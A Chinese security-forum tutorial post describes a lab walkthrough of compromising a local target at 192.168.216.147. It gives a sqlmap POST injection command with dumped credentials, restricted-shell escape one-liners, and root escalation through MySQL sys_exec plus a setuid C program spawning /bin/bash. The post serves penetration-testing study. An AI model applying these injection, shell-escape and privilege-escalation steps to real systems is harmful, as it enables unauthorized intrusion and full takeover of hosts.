最新的backtrack5(bt5)官方网站已经提供下载,backtrack5是基于ubuntu Lucid LTS. 内核2.6.38开发的,完全开源并和GPL兼容。

Backtrack 中文网

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

搜索
查看: 6757|回复: 3

[教程] sqlmap使用POST方法提交入侵网站过程

[复制链接]
冯子宁
浦冬菱

1、ifconfig、netdiscover、Nmap扫描获取网络信息,发现了samba服务,用metasploit溢出试试。

2、打开网站http://192.168.216.147,一个登入框,试了万能密码,登入不进去。
3、通过metasploit的测试,发现溢出并不成功,但是发现使用的是samba3.0.28, Exploit exception: This target is not a vulnerable Samba server (Samba 3.0.28a) 在exploit_db上搜索,并没有发现可以利用的。看来只能从网站入手了。
4、使用brupsuite查看到登入功能使用post提交数据,数据为:myusername=admin&mypassword=admin&Submit=Login。
5、sqlmap 使用POST方法提交
sqlmap -u “192.168.216.147/checklogin.php” data “myusername=admin&mypassword=admin&Submit=Login” level=5 risk=3 dbs
available databases [3]:
  • information_schema
  • members
  • mysql

  • 6~7 、存在注入,收集信息。
    8、看来是入侵成功了,那后面的就是暴数据了。
    +———-+
    | username |
    +———-+
    | john |
    | robert |
    +———-+
    +———————+
    | password |
    +———————+
    | MyNameIsJohn |
    | ADGAdsafdfwt4gadfga== |
    +———————+
    9、看来john可以利用啊
    10、使用john居然登入不了网站,那这个密码ssh的?试试。
    11、登入成功了,但是不能使用任何命令,连id等不行。但是他提示使用?和
    help可以。使用?发现能使用的命令只有cd clear echo exit help ll lpath ls。
    12、通过google查到: If commands are limited, you break out of the “jail” shell? python -c ‘import pty;pty.spawn(“/bin/bash”)’ echo os.system(‘/bin/bash’) /bin/sh -i
    13、既然echo可以使用,使用上面的语句执行后能正常运行其他命令了,又到了提权部分,这部分一直是弱项。。埃。。。
    14、查看进程发现: root 4781 0.4 9.6 127448 24684 ? Sl 12:10 0:32 /usr/sbin/mysql
    mysql的执行权限居然是root。
    15、mysql连接: mysql -h localhost -u root,居然直接进入了,没密码。
    16、记得mysql可以执行系统命令,使用方法为:system 或者\!;
    17、实验下,使用system id:发现: mysql> system id; uid=1001(john) gid=1001(john) groups=1001(john) mysql> system whoami john
    还是john。。。fck。。;
    18、最后实在不知道怎么办了,只好求教了。看了教程,上面使用的是 SELECT sys_exec(‘touch /tmp/thisisatest’);能成功,而且是root权限。
    19、按照教程写了溢出程序在目标主机的/tmp/目录下: int main() { setresuid(0, 0, 0); setresgid(0, 0, 0); system( “/bin/bash” ); return 0; }
    编译(不知道为啥,没有gcc程序,没办法)。
    20,这个exploit的程序执行权限只是john,使用mysql更改权限。
    21、命令:
    SELECT sys_exec(‘chown root.root /tmp/exploit’) SELECT sys_exec(‘chmod 755 /tmp/exploit’);
    22、执行溢出exploit,获得root权限。

    +1
    6762°C
    3
    • jiezi123
    • dalongs4
    • fishfish
    过: 他们
    心采
    亓官邵美
    66666666666666666666666~~~~~~~~~~~~~~~~·
    磨和悌
    磨和悌
    66666666666666666666666666666666666666666
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    BackTrack是一套专业的计算机安全检测的Linux操作系统,简称BT。BackTrack 是一个基于Ubuntu GNU/Linux的发行版本,主要用做数字取证和入侵测试。它的名字引用自回溯法(backtracking)。BackTrack 给用户提供了大量功能强大但简单易用的安全工具软件。BackTrack还支持Live CD和Live USB启动方式,用户可以直接从移动介质启动该系统而不用将系统安装在硬盘上。BackTrack被设计成一体化的旨在安全审计用的livecd,曾经它是被最广泛采用的渗透测试框架并被世界各地的安全社区所使用。现在,BackTrack已被Kali Linux所代替,BT将不再维护。
    快速回复 返回顶部 返回列表